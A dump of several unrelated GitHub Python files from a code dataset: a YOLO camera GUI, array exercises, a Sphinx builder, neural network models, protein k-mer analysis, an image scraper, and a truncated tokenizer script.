cv2.dnn.blobFromImage(frame, 1 / 255, (self.whT, self.whT), [0, 0, 0], 1, crop=False)\n self.net.setInput(blob)\n layerNames = self.net.getLayerNames()\n outputNames = [layerNames[i - 1] for i in self.net.getUnconnectedOutLayers()]\n outputs = self.net.forward(outputNames)\n self.findobject(outputs, frame)\n\n Image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n FlippedImage = cv2.flip(Image, 1)\n\n Convert2QtFormat = QImage(FlippedImage.data, FlippedImage.shape[1], FlippedImage.shape[0], QImage.Format_RGB888)\n Pic = Convert2QtFormat.scaled(281, 221, Qt.KeepAspectRatio)\n self.ImageUpdate.emit(Pic)\n\n def stop(self):\n self.ThreadActive = False\n self.quit()\n\n def findobject(self,outputs,img):\n confThreshold = 0.3\n nmsThreshold = 0.3\n hT, wT, cT = img.shape\n bbox = []\n classIds = []\n confs = []\n\n for output in outputs:\n for det in output:\n scores = det[5:]\n classId = np.argmax(scores)\n confidence = scores[classId]\n if confidence > confThreshold:\n w, h = int(det[2]*wT), int(det[3]*hT)\n x, y = int((det[0]*wT)-w/2), int((det[1]*hT)-h/2)\n bbox.append([x,y,w,h])\n classIds.append(classId)\n confs.append(float(confidence))\n indices = cv2.dnn.NMSBoxes(bbox, confs, confThreshold, nmsThreshold)\n print(indices)\n for i in indices:\n box = bbox[i]\n x,y,w,h = box[0], box[1], box[2], box[3]\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 255), 2)\n # cv2.putText(img, f'{self.classNames[classIds[i]].upper()}{int(confs[i] * 100)}%',\n # (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 0, 255), 2)\n\n\n\n\nclass SerialThread(QThread):\n d1 = pyqtSignal(float)\n d2 = pyqtSignal(float)\n d3 = pyqtSignal(float)\n d4 = pyqtSignal(float)\n\n def run(self):\n #global d1, d2, d3, d4\n\n while True:\n dataRaw = ser.read()\n if (dataRaw == b'@'):\n dataRaw = ser.read(16)\n\n self.d1 = unpack('f', dataRaw[0:4])[0]\n self.d2 = unpack('f', dataRaw[4:8])[0]\n self.d3 = unpack('f', dataRaw[8:12])[0]\n self.d4 = unpack('f', dataRaw[12:16])[0]\n\n data_1.append('{:.2f}'.format(self.d1))\n data_2.append('{:.2f}'.format(self.d2))\n data_3.append('{:.2f}'.format(self.d3))\n data_4.append('{:.2f}'.format(self.d4))\n\n\nclass GraphScreen(QMainWindow):\n def __init__(self):\n super(GraphScreen, self).__init__()\n loadUi(\"UI.ui\", self)\n\n self.pushButton_2.clicked.connect(self.display)\n self.cameraButton.clicked.connect(self.camDisplay)\n\n def camDisplay(self):\n self.cam = Worker()\n self.cam.start()\n self.cam.ImageUpdate.connect(self.imageUpdateSlot)\n self.cameraButton.setEnabled(False)\n\n def imageUpdateSlot(self, Image):\n self.label_7.setPixmap(QPixmap.fromImage(Image))\n\n def display(self):\n self.textBrowser.setText(\"0\")\n self.textBrowser_2.setText(\"0\")\n self.textBrowser_3.setText(\"0\")\n self.textBrowser_4.setText(\"0\")\n\n self.serth = SerialThread()\n self.serth.start()\n\n self.qTimer = QTimer()\n self.qTimer.setInterval(100)\n self.qTimer.timeout.connect(self.check)\n self.qTimer.start()\n self.pushButton_2.setEnabled(False)\n\n def check(self):\n self.textBrowser.setText(\"{:.2f}\".format(self.serth.d1))\n self.textBrowser_2.setText(\"{:.2f}\".format(self.serth.d2))\n self.textBrowser_3.setText(\"{:.2f}\".format(self.serth.d3))\n self.textBrowser_4.setText(\"{:.2f}\".format(self.serth.d4))\n\n\n #time.sleep(2)\n\n\napp = QApplication(sys.argv)\ngraph = GraphScreen()\nwidget = QtWidgets.QStackedWidget()\nwidget.addWidget(graph)\nwidget.setFixedHeight(326)\nwidget.setFixedWidth(696)\nwidget.show()\ntry:\n sys.exit(app.exec_())\nexcept:\n print(\"exiting\")","repo_name":"tfqqrman/chickenProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31745049555","text":"\"\"\"\nGiven an array arr[] of positive integers of size N. Reverse every sub-array group of size K.\n\"\"\"\nk = 3\narr = [1, 2, 3, 4, 5]\ni = 0\nwhile i < len(arr):\n m = i\n n = min(i+k-1, len(arr)-1)\n while m < n:\n arr[m], arr[n] = arr[n], arr[m]\n m += 1\n n -= 1\n i += k\n\nprint(arr)\n","repo_name":"shreyans-tiwari/Geeks4Geeks","sub_path":"Array/reverse_array_in_groups.py","file_name":"reverse_array_in_groups.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19250784972","text":"\"\"\"\r\n--------------------------------------------------------------------------\r\nCopyright (C) 2017-2020 Lukasz Laba \r\n\r\nThis file is part of Tebe.\r\n\r\nTebe is free software; you can redistribute it and/or modify\r\nit under the terms of the GNU General Public License as published by\r\nthe Free Software Foundation; either version 2 of the License, or\r\n(at your option) any later version.\r\n\r\nTebe is distributed in the hope that it will be useful,\r\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\r\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\nGNU General Public License for more details.\r\n\r\nYou should have received a copy of the GNU General Public License\r\nalong with Tebe; if not, write to the Free Software\r\nFoundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\r\n--------------------------------------------------------------------------\r\n\"\"\"\r\n\r\nimport sys\r\nimport platform\r\nimport os\r\nimport tempfile\r\nimport subprocess\r\nimport shutil\r\n\r\nimport src.pycore.app_utils as app_utils\r\n\r\nPYTHON_BIN_PATH = os.path.dirname(sys.executable)\r\nif platform.system() == 'Windows':\r\n sphinxbuild_path = os.path.join(PYTHON_BIN_PATH, 'Scripts', 'sphinx-build')\r\nelse:\r\n sphinxbuild_path = os.path.join(PYTHON_BIN_PATH, 'sphinx-build')\r\n\r\n\r\nclass SphinxBuilder:\r\n def __init__(self):\r\n\r\n self.tmp_html_dir = self.__get_tempdir('tebeHTML')\r\n self.tmp_pdf_dir = self.__get_tempdir('tebePDF')\r\n # ---\r\n self.Content = None\r\n # ---\r\n self.theme = None\r\n self.theme_template_dir = app_utils.abspath('pycore/sphinx_conf_template')\r\n # ---\r\n self.confdir = None\r\n # ----\r\n self.where_pdf_saved = None\r\n # ----\r\n self.__html_is_builded_for = None\r\n # ---\r\n self.set_theme()\r\n\r\n @staticmethod\r\n def __get_tempdir(prefix_string):\r\n\r\n dirpath = tempfile.mkdtemp()\r\n dirname = os.path.basename(dirpath)\r\n new_dirname = prefix_string + '_' + dirname\r\n new_dirpath = dirpath.replace(dirname, new_dirname)\r\n os.rename(dirpath, new_dirpath)\r\n return new_dirpath\r\n\r\n # -----------------------------------------------------\r\n def assign_content_object(self, content_object):\r\n self.Content = content_object\r\n\r\n def get_available_themes(self):\r\n theme_list = []\r\n for name in os.listdir(self.theme_template_dir):\r\n if '.' not in name:\r\n theme_list.append(name)\r\n theme_list.sort()\r\n return theme_list\r\n\r\n def set_theme(self, theme='basic_like_paper'):\r\n # ---\r\n self.confdir = self.theme_template_dir\r\n self.confdir = os.path.join(self.confdir, theme)\r\n # ---\r\n self.theme = theme\r\n\r\n # -----------------------------------------------------\r\n\r\n @property\r\n def source_dir_path(self):\r\n if self.Content:\r\n return self.Content.source_dir_path\r\n else:\r\n return None\r\n\r\n def build_html(self):\r\n if self.source_dir_path:\r\n # ---\r\n scrdir = self.source_dir_path\r\n outdir = self.tmp_html_dir\r\n # ---\r\n if self.Content.conf_file_path:\r\n proc = subprocess.Popen([sphinxbuild_path,\r\n '-b', 'html',\r\n scrdir, outdir])\r\n else:\r\n if self.theme == 'sphinx_rtd_theme':\r\n proc = subprocess.Popen(['cp', self.confdir+\"/conf.py\", scrdir])\r\n proc.wait()\r\n proc=subprocess.Popen([sphinxbuild_path,\r\n '-b', 'html',\r\n scrdir, outdir])\r\n else:\r\n proc = subprocess.Popen([sphinxbuild_path,\r\n '-b', 'html',\r\n '-c', self.confdir,\r\n scrdir, outdir])\r\n proc.wait()\r\n # ---\r\n self.__html_is_builded_for = self.source_dir_path\r\n print('build_html done')\r\n\r\n def build_pdf(self, dst_file=None):\r\n self.where_pdf_saved = None\r\n # ---\r\n for fname in os.listdir(self.tmp_pdf_dir):\r\n if '.pdf' in fname:\r\n file_pth = os.path.join(self.tmp_pdf_dir, fname)\r\n os.remove(file_pth)\r\n # ---\r\n if self.source_dir_path:\r\n # ---\r\n scrdir = self.source_dir_path\r\n print(scrdir)\r\n outdir = self.tmp_pdf_dir\r\n # ---\r\n if self.Content.conf_file_path:\r\n proc = subprocess.Popen([sphinxbuild_path,\r\n '-b', 'pdf',\r\n scrdir, outdir])\r\n else:\r\n proc = subprocess.Popen([sphinxbuild_path,\r\n '-b', 'pdf',\r\n '-c', self.confdir,\r\n scrdir, outdir])\r\n proc.wait()\r\n # ---\r\n for fname in os.listdir(self.tmp_pdf_dir):\r\n if '.pdf' in fname:\r\n scr_file = os.path.join(self.tmp_pdf_dir, fname)\r\n if not dst_file:\r\n dst_file = os.path.join(self.source_dir_path, fname)\r\n shutil.copyfile(scr_file, dst_file)\r\n # ---\r\n self.where_pdf_saved = dst_file\r\n print('build_pdf done')\r\n\r\n # -----------------------------------------------------\r\n def is_html_builded(self):\r\n if self.source_dir_path:\r\n if self.source_dir_path == self.__html_is_builded_for:\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\n def html_path_for(self, markup_file):\r\n html_file_name = markup_file\r\n html_file_name = html_file_name.replace('.rst', '.html')\r\n html_file_name = html_file_name.replace('.md', '.html')\r\n html_file_path = os.path.join(self.tmp_html_dir, html_file_name)\r\n return html_file_path\r\n\r\n # -----------------------------------------------------\r\n def delete_tmpdirs(self):\r\n shutil.rmtree(self.tmp_html_dir)\r\n shutil.rmtree(self.tmp_pdf_dir)\r\n\r\n def close(self):\r\n self.delete_tmpdirs()\r\n self.tmp_html_dir = None\r\n self.tmp_pdf_dir = None\r\n\r\n def __del__(self):\r\n if self.tmp_html_dir:\r\n self.close()\r\n","repo_name":"jrdcasa/sphinx-gui3","sub_path":"src/pycore/SphinxBuilder.py","file_name":"SphinxBuilder.py","file_ext":"py","file_size_in_byte":6677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"12956174275","text":"\"\"\"Runner module for demoapp\"\"\"\n\nimport argparse\nimport sys\n\nimport demoapp\n\n\ndef parse_args(args):\n \"\"\"Parse command line parameters\n\n Args:\n args: command line parameters as list of strings\n\n Returns:\n :obj:`argparse.Namespace`: command line parameters\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"A demo application for PyScaffold's unit testing\"\n )\n version = demoapp.__version__\n parser.add_argument(\n \"-v\", \"--version\", action=\"version\", version=f\"demoapp {version}\"\n )\n opts = parser.parse_args(args)\n return opts\n\n\ndef main(args):\n parse_args(args)\n print(\"Hello World\")\n\n\ndef run():\n \"\"\"\n Entry point for setup.py\n \"\"\"\n main(sys.argv[1:])\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"pyscaffold/pyscaffold","sub_path":"tests/demoapp/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":1901,"dataset":"github-code","pt":"69"}
+{"seq_id":"74815956379","text":"import torch\r\nimport torch.nn as nn\r\nimport snntorch as snn\r\nfrom snntorch import surrogate\r\nfrom snntorch import utils\r\n\r\nclass SNN(nn.Module):\r\n def __init__(self,beta=0.9):\r\n super(SNN, self).__init__()\r\n self.beta=beta\r\n self.spike_grad=surrogate.fast_sigmoid()\r\n self.net=nn.Sequential(\r\n nn.Conv2d(1, 6, 5),\r\n nn.MaxPool2d(2),\r\n snn.Leaky(beta=self.beta, spike_grad=self.spike_grad, init_hidden=True),\r\n nn.Conv2d(6, 16, 5),\r\n nn.MaxPool2d(2),\r\n snn.Leaky(beta=self.beta, spike_grad=self.spike_grad, init_hidden=True),\r\n nn.Flatten(),\r\n nn.Linear(16*4*4, 10),\r\n snn.Leaky(beta=self.beta, spike_grad=self.spike_grad, init_hidden=True, output=True)\r\n )\r\n \r\n def forward(self, x, num_steps=100):\r\n spk_rec=[]\r\n utils.reset(self.net)\r\n for step in range(num_steps):\r\n spk_out,mem_out=self.net(x)\r\n spk_rec.append(spk_out)\r\n return torch.stack(spk_rec)\r\n\r\nclass CNN(nn.Module):\r\n def __init__(self):\r\n super(CNN, self).__init__()\r\n self.conv1 = nn.Sequential( \r\n nn.Conv2d(1, 6, 5),\r\n nn.ReLU(), \r\n nn.MaxPool2d(2), \r\n )\r\n self.conv2 = nn.Sequential( \r\n nn.Conv2d(6, 16, 5), \r\n nn.ReLU(), \r\n nn.MaxPool2d(2), \r\n )\r\n\r\n self.fc1 = nn.Sequential(\r\n nn.Linear(256, 120),\r\n nn.ReLU(),\r\n )\r\n self.fc2 = nn.Sequential(\r\n nn.Linear(120, 84),\r\n nn.ReLU(),\r\n )\r\n self.fc3 = nn.Sequential(\r\n nn.Linear(84, 10),\r\n nn.LeakyReLU(),\r\n\r\n )\r\n \r\n def forward(self, x):\r\n x1 = self.conv1(x)\r\n x2 = self.conv2(x1)\r\n x2 = x2.view(x.size(0), -1)\r\n x3 = self.fc1(x2)\r\n x4 = self.fc2(x3)\r\n x5 = self.fc3(x4)\r\n return x5\r\n\r\n\r\nif __name__ == \"__main__\":\r\n net = CNN()\r\n snn_net = SNN()\r\n a = torch.randn(5, 1, 28, 28)\r\n print(snn_net(a))\r\n print(net(a))\r\n ","repo_name":"Gennadiyev/amspp","sub_path":"tests/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"3147274819","text":"# CPPPATH defined the include path for include \"..\"\n# (open) I think include <..> uses a different path\nenv = Environment(CPPPATH='.')\n\n# dynamic library formal\nall_src_files_normal=Glob('normal/*.cpp')\nnormalSharedLib=env.SharedLibrary('normal/cppnative', all_src_files_normal)\nenv.Alias(\"install\",env.Install(\"/repo_cpp/lib\",normalSharedLib))\n\n# dynamic library stub\nall_src_files_stub=Glob('stub/*.cpp')\nstubSharedLib=env.SharedLibrary('stub/cppnative', all_src_files_stub)\nenv.Alias(\"install\",env.Install(\"/repo_cpp/stublib\",stubSharedLib))\n\n# copy the public header files\nall_public_header_files=Glob('*.h')\nenv.Alias(\"install\",env.Install(\"/repo_cpp/inc\",all_public_header_files))\n\n\n\n","repo_name":"cliveyao/sandbox","sub_path":"rpm/rpm-jni-cpp/cpp/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35189177612","text":"import os\nimport subprocess\n\n# Set the base directory to search\nbase_dir = \"/home/drevesz/Desktop/segmentation_may23/Images\"\n\n# Set the path to the ADSRun.py script\nads_script = \"/home/drevesz/Desktop/segmentation_may23/scripts/ADSv1.2/codes/ADSRun.py\"\n\n# Loop through all subdirectories\nfor root, dirs, files in os.walk(base_dir):\n for dir in dirs:\n # Get the full path to the subdirectory\n subdir_path = os.path.join(root, dir)\n # Construct the command to run ADSRun.py on the subdirectory\n cmd = f\"python {ads_script} -input {subdir_path}\"\n # Use subprocess to execute the command\n subprocess.run(cmd, shell=True)","repo_name":"drevesz11/HNI-automatedpipeline","sub_path":"ADSRun_loop_final.py","file_name":"ADSRun_loop_final.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74792671260","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 14 00:18:24 2022\n\n@author: lvyang\n\"\"\"\n\nimport numpy as np\nfrom sklearn import preprocessing\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport pandas as pd\nimport tqdm\nimport os\nimport itertools\nimport work_with_files\n\n\ndef occurrences_count(string, sub):\n \"\"\"\n Counting all ocurrances of substring in string using find() method\n\n Args:\n string: str, string where to find\n sub: str, string to find\n\n Returns:\n int, number of occurrances\n \"\"\"\n # Starting index and count num\n count = start = 0\n\n # Counting\n while True:\n # If found count = count + 1\n # start = {where was found} +1\n\n start = string.find(sub, start) + 1\n if start > 0:\n count += 1\n else:\n return count\n\n\ndef making_aa_k_mers(k):\n \"\"\"\n Making all possible subsequences with length k using aminoacids (order is important)\n Args:\n k: int, length of k-mer\n\n Returns:\n list of all possible aminoacid k-mer sequences\n \"\"\"\n amino_string = 'ARNDCQEGHILKMFPSTWYV'\n\n # making all possible substrings\n subseq_iter = itertools.product(amino_string, repeat=k)\n aa_k_mer_list = list(subseq_iter)\n\n # one \"for\" to deal with tuples which we get from itertools stuff\n for i in range(len(aa_k_mer_list)):\n\n # tuples are in list\n tup = aa_k_mer_list[i]\n\n # rewriting list elements\n aa_k_mer_list[i] = ''.join(tup)\n\n return aa_k_mer_list\n\n\ndef seqio_data(seq_record):\n \"\"\"\n Working with SeqRecord class\n\n Args:\n seq_record: SeqRecord class from Biopython\n\n Returns:\n protein_name: str, name of protein\n sequence: str, sequence of protein\n \"\"\"\n\n # getting protein name\n protein = seq_record.name\n\n # getting sequence\n seq = str(seq_record.seq)\n\n return protein, seq\n\n\ndef finding_freq_single_protein(seq, aa_k_mer_list):\n \"\"\"\n Finding frequnces for subsequences in single protein\n and scaling it with SKlearn StandardScaler()\n\n Args:\n seq: str, sequence of amino acids in protein\n aa_k_mer_list: lst, all possible k-mers for aminoacids\n\n Returns:\n list, frequency of all k-mers from aa_k_mer_list, vector is normalized using sklearn\n \"\"\"\n\n # Getting initial sizes\n n = len(seq)\n\n # Initializing list where all frequencies will be saved\n vector_freq = []\n\n # Counting frequencies\n for x in aa_k_mer_list:\n vector_freq.append(float(occurrences_count(seq, x)) / n)\n\n # Making some prep with array\n vector_freq = np.array(vector_freq)\n vector_freq = vector_freq.reshape((-1, 1))\n\n # Standardizing our frequencies\n scaler = preprocessing.StandardScaler()\n vector_freq_scaled = scaler.fit_transform(vector_freq)\n \n # Getting return converting dimensions\n result = vector_freq_scaled.reshape(1, -1)[0].tolist()\n \n return result\n\ndef main_analysis(path, k_mer_num,output_file_name, trembl_usage_human=False,):\n \"\"\"\n Construct \"organism_name\".csv with k-mer analyzes. Will store analyzed file in 'data/csv_data' directory.\n !!!Warning!!! can take much time, so be prepared and sure that all parameters are good\n Args:\n path: str, path to file in fasta format with represantative proteome used in analyzes\n k_mer_num: int, k-mer length\n trembl_usage: bool, default is False. Do you use represantative proteome for human with TrEMBL proteins or not?\n \"\"\"\n # creating dir to store CSVs produced by function\n\n # initializing aa_subseqs\n aa_k_mer_list = making_aa_k_mers(k_mer_num)\n\n # initializing DataFrame\n table_columns = ['Organism', 'Protein'] + aa_k_mer_list\n proteins_data = pd.DataFrame(columns=table_columns)\n\n # reading\n prot_records= work_with_files.read_fasta(path)\n \n num_iter=1\n # dealing with human, because it needs to be analyzed separately\n if 1:\n\n # initializing list\n human_list = []\n\n # appending all human proteins to list and splitting it into 100 parts\n prot_records_split = np.array_split(prot_records, num_iter)\n for prot_data_part in prot_records_split:\n human_list.append(prot_data_part)\n\n # We will split analyze of human, because human proteom is too big to handle\n for j in tqdm.tqdm(range(0, num_iter)):\n\n # Creating pd.df\n proteins_data = pd.DataFrame(columns=table_columns)\n index = 0\n\n\n for i in range(len(human_list[j])):\n\n # taking exact protein and calculating metrics (frequencies)\n SeqRecord = human_list[j][i]\n prot_name, seq = seqio_data(SeqRecord)\n freq_vector = finding_freq_single_protein(seq, aa_k_mer_list)\n\n # making row for table\n adding_row = []\n adding_row.append(output_file_name)\n adding_row.append(prot_name)\n adding_row += freq_vector\n\n # adding row to the DataFrame\n proteins_data.loc[index] = adding_row\n index += 1\n\n # Writing file for every part of data, we will combine them later\n writing_path = \"data2/\"+output_file_name + f'_{ k_mer_num}_mer_' + '.csv'\n proteins_data.to_csv(writing_path)\n else:\n \n # Rewriting index\n index = 0\n\n # working with NOT human proteomes\n for i in tqdm.tqdm(range(len(prot_records))):\n\n # reading protein to calculate metrics on it\n seq_record = prot_records[i]\n prot_name, seq = seqio_data(seq_record)\n\n # calculating metrics (frequencies)\n freq_vector = finding_freq_single_protein(seq, aa_k_mer_list)\n\n # making row for pandas\n adding_row = []\n adding_row.append(output_file_name)\n adding_row.append(prot_name)\n adding_row += freq_vector\n\n # adding row to the DataFrame\n proteins_data.loc[index] = adding_row\n index += 1\n\n # Writing file\n writing_path = \"data2/\"+output_file_name + '_' + '.csv'\n proteins_data.to_csv(writing_path)\n\n\ndef main(file, k,data_type):\n main_analysis(file, k,data_type)\n \nk_mer=2\n#feature_number=20**k_mer\nfor i in[\"Train_Positive\",\"Train_Negative\",\"Test_Positive\",\"Test_negative\"]: \n main(r\"data2/%s.fasta\"%i,k_mer,i)\n","repo_name":"NWAFU-LiuLab/LYnet","sub_path":"Step2 Model_training_validation/protein-k-mer.py","file_name":"protein-k-mer.py","file_ext":"py","file_size_in_byte":6473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"40634961609","text":"'''Escribe un programa para leer a través de un historial de correos, \nconstruye un histograma utilizando un diccionario para contar \ncuantos mensajes han llegado de cada dirección de correo electrónico, \ne imprime el diccionario'''\n\nd = dict()\n\ndef separador(a):\n b = a.split()\n return b[1]\n\ndef hola(manejador):\n\n for linea in manejador:\n if len(linea.split()) == 0 or linea.split()[0] != 'From':\n \n continue\n d[separador(linea)] = d.get(separador(linea),0)+1\n \n\n\nhola(open(\"actividad7/mbox-short.txt\"))\nprint(d)","repo_name":"idril150/mango","sub_path":"actividad8/ejercicio2.py","file_name":"ejercicio2.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"44395686396","text":"#!/usr/bin/env python3\n\n\nimport logging\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import classification_report\nfrom sklearn.calibration import CalibrationDisplay\nfrom sklearn.metrics import roc_curve, roc_auc_score, RocCurveDisplay\nfrom sklearn.metrics import precision_recall_curve, PrecisionRecallDisplay\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef getFeatureImportance(model):\n calClassifiers = model.named_steps['estimator'].calibrated_classifiers_\n importances = 0\n for classifier in calClassifiers:\n importances += classifier.base_estimator.feature_importances_\n importances /= len(calClassifiers)\n # model.named_steps['estimator'].base_estimator.feature_importances_\n importances = pd.Series(\n importances,\n model.named_steps['preprocess'].named_steps['prepare'].validCols\n ).sort_values(ascending=True)\n return importances\n\n\ndef _processTestData(model, data):\n y_test = data['y_test'].apply(\n lambda x: 1 if x == model.classes_[1] else 0)\n test_pred_proba = model.predict_proba(data['X_test'])[:,1]\n return y_test, test_pred_proba\n\n\ndef plotROC(models, data, figsize=None):\n fig, ax = plt.subplots(figsize=figsize)\n labels = []\n for name in ['logistic', 'catboost']:\n model = models[name]['model']\n y_test, test_pred_proba = _processTestData(model, data)\n AUC = roc_auc_score(y_test, test_pred_proba)\n fpr, tpr, thresholds = roc_curve(\n y_test, test_pred_proba, drop_intermediate=False)\n idx = np.nanargmin(np.abs(fpr + tpr - 1))\n RocCurveDisplay.from_estimator(\n model, data['X_test'], data['y_test'], ax=ax)\n if name == 'catboost':\n ax.axhline(tpr[idx], xmax=fpr[idx], ls='--', alpha=0.5, c='black')\n ax.axvline(fpr[idx], ymax=tpr[idx], ls='--', alpha=0.5, c='black')\n ax.scatter(fpr[idx], tpr[idx], c='black')\n label = f'{name}: AUC = {AUC:.2f}, Threshold = {thresholds[idx]:.3f}'\n labels.append(label)\n ax.axline((0, 0), slope=1, ls='--', color='red')\n ax.set_xlim([0, 1])\n ax.set_ylim([0, 1])\n ax.set_xlabel('False Positive Rate')\n ax.set_ylabel('True Positive Rate')\n ax.legend(labels=labels, loc='lower right')\n return fig, ax\n\n\ndef plotPrecisionRecall(models, data, figsize=None):\n fig, ax = plt.subplots(figsize=figsize)\n labels = []\n for name in ['logistic', 'catboost']:\n model = models[name]['model']\n y_test, test_pred_proba = _processTestData(model, data)\n precision, recall, thresholds = precision_recall_curve(\n y_test, test_pred_proba, pos_label=1)\n fscore = (2 * precision * recall) / (precision + recall)\n idx = np.nanargmax(fscore)\n PrecisionRecallDisplay.from_estimator(\n model, data['X_test'], data['y_test'], ax=ax)\n if name == 'catboost':\n ax.axhline(precision[idx], xmax=recall[idx], ls='--', alpha=0.5, c='black')\n ax.axvline(recall[idx], ymax=precision[idx], ls='--', alpha=0.5, c='black')\n ax.scatter(recall[idx], precision[idx], c='black')\n label = f'{name}: F-score = {fscore[idx]:.2f}, Threshold = {thresholds[idx]:.3f}'\n labels.append(label)\n noSkill = data['y_test'].sum() / len(data['y_test'])\n ax.axline((0, noSkill), (1, noSkill), ls='--', color='red')\n ax.set_xlim([0, 1])\n ax.set_ylim([0, 1])\n ax.set_xlabel('Recall')\n ax.set_ylabel('Precision')\n ax.legend(labels=labels, loc='upper right')\n return fig, ax\n\n\ndef plotCalibrationCurve(models, data, figsize=None, **kwargs):\n fig, ax = plt.subplots(figsize=figsize)\n names = ['logistic', 'catboost']\n for name in names:\n model = models[name]['model']\n CalibrationDisplay.from_estimator(\n model, data['X_test'], data['y_test'],\n ref_line=False, ax=ax, **kwargs)\n ax.axline((0, 0), slope=1, ls='--', color='red')\n ax.set_xlim(0, 1)\n ax.set_ylim(0, 1)\n ax.legend(labels=names, loc='lower right')\n return fig, ax\n\n\ndef predict(model, X):\n \"\"\" Generate predictions using trained model \"\"\"\n try:\n param = 'preprocess__prepare__decisionThreshold'\n threshold = model.get_params()[param]\n except KeyError:\n logger.error('No threshold set - setting to 0.5.')\n threshold = 0.5\n classes = model.classes_\n out = pd.DataFrame(model.predict_proba(X), columns=classes)\n out['class'] = out[classes[1]].apply(\n lambda x: classes[0] if x < threshold else classes[1])\n return out.values\n\n\ndef evaluate(model, data):\n \"\"\" Generate classification report using test data \"\"\"\n predictions = predict(model, data['X_test'])[:,2]\n report = classification_report(\n data['y_test'], predictions, output_dict=True)\n return report\n","repo_name":"nhsx/dna-risk-predict","sub_path":"src/dnattend/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16435702663","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport os\r\n\r\n\r\ndef download_page(url):\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0\"}\r\n r=requests.get(url,headers=headers)\r\n r.encoding=r.apparent_encoding\r\n return r.text\r\n\r\ndef get_pic_list1(url,html):\r\n soup=BeautifulSoup(html,'lxml')\r\n pic_list=soup.find('div',class_='postlist')\r\n pic_list=pic_list.find_all('li')\r\n b=[]\r\n name=[]\r\n for i in pic_list:\r\n temp1=i.find('a')\r\n b.append(url+temp1.get('href'))\r\n temp2=i.find('img')\r\n name.append(temp2.get('alt'))\r\n for i in range(len(b)):\r\n get_pic_list2(b[i],name[i])\r\n\r\ndef get_pic_list2(url,name):\r\n for i in range(1,10):\r\n if i==2:\r\n url=url[:-5]+'_{}'.format(i)+'.html'\r\n elif i!=1 and i!=2:\r\n url=url[:-7]+'_{}'.format(i)+'.html'\r\n r=requests.get(url,headers={\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0\"})\r\n r.encoding=r.apparent_encoding\r\n soup=BeautifulSoup(r.text,'lxml')\r\n pic_list=soup.find('div',class_='main-image').find('img')\r\n link=pic_list.get('src')\r\n get_pic(link,name,i)\r\n\r\ndef get_pic(link,name,i):\r\n headers={\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0\"}\r\n r=requests.get(link,headers=headers)\r\n create_dir('link/{}'.format(name))\r\n with open('link/{}/{}.png'.format(name,i),'wb')as f:\r\n f.write(r.content)\r\n\r\n\r\ndef create_dir(name):\r\n if not os.path.exists(name):\r\n os.makedirs(name)\r\n\r\ndef execute(url):\r\n page_html=download_page(url)\r\n get_pic_list1(url,page_html)\r\n\r\ndef main():\r\n create_dir('pic')\r\n url='https://www.youmzi.com/'\r\n execute(url)\r\n\r\nif __name__=='__main__':\r\n main()\r\n","repo_name":"hujunhao66666/python---spider","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4853870002","text":"import argparse\nfrom glob import glob\n\nfrom tokenizers import BranchingEntropyDictionaryBuilder\nfrom tokenizers import DroprateScoreDictionaryBuilder\nfrom tokenizers import WordPieceModelBuilder\nfrom utils import check_dirs\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--corpus_directory',\n type=str,\n default='./',\n help='corpus directory'\n )\n parser.add_argument('--tokenizer_type',\n type=str,\n default='droprate',\n choices=['droprate', 'branching_entropy', 'wpm'],\n help='tokenizer type'\n )\n parser.add_argument('--tokenizer_fname',\n type=str,\n default='./noname',\n help='tokenizer_name'\n )\n parser.add_argument('--min_frequency',\n type=int, default=100,\n help='minimum frequency for universial vocabulary construction'\n )\n parser.add_argument('--subword_max_length',\n type=int,\n default=8,\n help='maximum length of left-side subsection 